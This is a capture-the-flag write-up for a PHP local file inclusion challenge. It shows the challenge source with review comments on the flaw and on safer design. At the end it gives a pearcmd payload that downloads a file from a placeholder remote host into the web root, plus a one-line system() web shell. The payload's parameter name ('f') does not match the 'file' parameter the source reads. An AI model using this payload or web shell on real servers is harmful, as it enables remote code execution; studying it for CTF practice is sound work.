# [NewStarCTF 2023 公开赛道] Include 🍐
<?php
// Challenge source as published for NewStarCTF 2023 "Include": it includes a
// PHP file named by the `file` query parameter, or prints its own source when
// the parameter is absent. The code is kept verbatim; comments are review notes.
error_reporting(0); // report no errors, so a failed include leaves no visible trace
if(isset($_GET['file'])) {
$file = $_GET['file']; // untrusted value taken straight from the query string
// Denylist: the request is rejected when the value contains any of these
// substrings (case-insensitive). A denylist only names the known-bad inputs;
// every other name that resolves to "<value>.php" stays reachable.
if(preg_match('/flag|log|session|filter|input|data/i', $file)) {
die('hacker!');
}
// Local file inclusion: the path is attacker-controlled apart from the forced
// ".php" suffix, and a relative name is also looked up on PHP's include_path.
// Any script installed with the runtime can therefore be executed in this
// request context (the write-up's payload names `pearcmd`, which the denylist
// does not match).
// Safer design: map the parameter onto a fixed allowlist of page names and
// include only from a dedicated directory. Hardening on the host side:
// keep register_argc_argv off and do not ship unused PEAR tooling.
include($file.".php");
// NOTE(review): the hint below presumably points at a php.ini setting shown by
// phpinfo (this class of issue depends on register_argc_argv) — confirm.
# Something in phpinfo.php!
}
else {
highlight_file(__FILE__);
}
?>
payload:
?f=pearcmd&+install+-R+/var/www/html+http://ip:port/eval.php
eval.php:
<?php | |
echo '<?php system($_GET[0]);'; |